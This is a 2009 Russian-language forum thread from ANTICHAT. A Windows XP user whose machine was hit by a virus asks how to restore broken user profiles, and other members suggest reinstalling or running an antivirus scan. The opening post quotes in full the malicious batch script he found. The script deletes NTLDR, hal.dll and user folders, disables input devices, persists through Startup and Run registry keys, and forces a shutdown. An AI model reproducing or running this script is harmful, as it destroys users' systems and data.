ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу настройки пользователя winxp
   
Закрытая тема
Страница 1 из 4 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

настройки пользователя winxp
  #1  
Старый 28.08.2009, 01:27
Sholoman
Познающий
Регистрация: 05.03.2008
Сообщений: 31
Провел на форуме:
442871

Репутация: 15
По умолчанию настройки пользователя winxp
Всем привет!
Зародилась проблема, по средине для открыл ***.exe после открытия файл уничтожился, сразу понял что вирус я начал искать файлы и нашел 2 батника в первом просто текст а втором вот
Код:
cd\
ATTRIB -R -H -S c:\*.*
del /f /s /q NTLDR
cd %windir%
cd system32
start c:\hello.bat \wait
rmdir /s /q "C:\Documents and Settings\"
del /f /s /q hal.dll
cd c:\windows/system32
del HAL.DLL /f /s /q
cd c:\windows/servicepackfiles/i386
del hal.dll /f /s /q
cd c:\windows/$NtServicePackUninstall$
del hal.dll /f /s /q
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE
COPY %0 *path*
COPY %0 "C:/Documents and Settings\All Users\Start Menu\Programs\Startup
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d *path to bat file\nameofbatfile.bat* /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v owned /t reg_sz /d *path to bat file\nameofbatfile.bat* /f
ipconfig /release
shutdown -s -t 120 -c "You Have 180 Seconds To save Your HD Information"
полетела винда пропал файл ntldr я его восстановил, удалились еще все файлы пользователей их я тоже восстановил через рстудия.

Сейчас у меня осталась одна проблема, удалились с компьютера все пользователи кроме моего.
Если создать новый пользователь то у него все не работает например отображение скрытых файлов, нельзя поменять заставку, фон, шрифт и так далее но у моего пользователя все работает отлично!

Есть еще файл NTUSER.DAT знаете наверно в документах лежит, если на него тыкнуть то сразу вылетает експлотер из-за чего не знаю =(

Как мне создать нормального пользователя с нормальными привилегиями, я так понял поменялись в реестре настройки которые идут по умолчанию из этого следует ...

Можно ли это както устранить ? Помогите...
 

  #2  
Старый 28.08.2009, 01:54
HakaR
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
Провел на форуме:
4435957

Репутация: 539
По умолчанию
Переустанови винду или антивирем весь хард проверь...
 

  #3  
Старый 28.08.2009, 01:57
Sholoman
Познающий
Регистрация: 05.03.2008
Сообщений: 31
Провел на форуме:
442871

Репутация: 15
По умолчанию
винду переустанавливать не собираюсь, так как больше 100gb сохранять придется.
мне кажется антивирус все не исправит, пытался еще программой для восстановления реестра все равно не катит.
 

  #4  
Старый 28.08.2009, 01:58
HakaR
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
Провел на форуме:
4435957

Репутация: 539
По умолчанию
Винда ХР??
 

  #5  
Старый 28.08.2009, 01:59
Sholoman
Познающий
Регистрация: 05.03.2008
Сообщений: 31
Провел на форуме:
442871

Репутация: 15
По умолчанию
да винда XP SP3
 

  #6  
Старый 28.08.2009, 02:03
HakaR
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
Провел на форуме:
4435957

Репутация: 539
По умолчанию
Проще винду переустановить... есть ещё вариант, но винда может криво работать...
 

  #7  
Старый 28.08.2009, 02:04
Sholoman
Познающий
Регистрация: 05.03.2008
Сообщений: 31
Провел на форуме:
442871

Репутация: 15
По умолчанию
давай )))
 

  #8  
Старый 28.08.2009, 02:11
HakaR
Участник форума
Регистрация: 23.07.2009
Сообщений: 261
Провел на форуме:
4435957

Репутация: 539
По умолчанию
Винду поверх своей винды установить И все данные остануться на своих местах...
 

  #9  
Старый 28.08.2009, 02:12
Sholoman
Познающий
Регистрация: 05.03.2008
Сообщений: 31
Провел на форуме:
442871

Репутация: 15
По умолчанию
так и знал что это напишешь )))
 

  #10  
Старый 28.08.2009, 02:24
=Zeus=
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме:
724939

Репутация: 108
Отправить сообщение для =Zeus= с помощью ICQ
По умолчанию
Цитата:
del /f /s /q hal.dll
RUNDLL MOUSE,DISABLE
RUNDLL KEYBOARD,DISABLE
Как после такого вообще что-то работает. Значит не сработал вирус, если клава в рабочем состоянии.
П.С. А кто знает, за что отвечает hal.dll ?

ТС, скачай с сайда ДрВеб сканер бесплатный, CureIt называется. Просканься. Хотя реестр придется вручную фиксить, если не хочешь переустонавливать винду.
Последний раз редактировалось =Zeus=; 28.08.2009 в 02:33..
 
Закрытая тема
Страница 1 из 4 1 2 3 4 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Введение в Symfony Framework gibson Авторские статьи 1 30.04.2009 11:15
Программы для работы с железом. Часть I – настройка видеокарт _GaLs_ Аппаратное обеспечение 2 20.12.2006 01:18
Аудит аутентификации на Web-сайтах. Часть первая k00p3r Чужие Статьи 0 13.06.2005 11:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ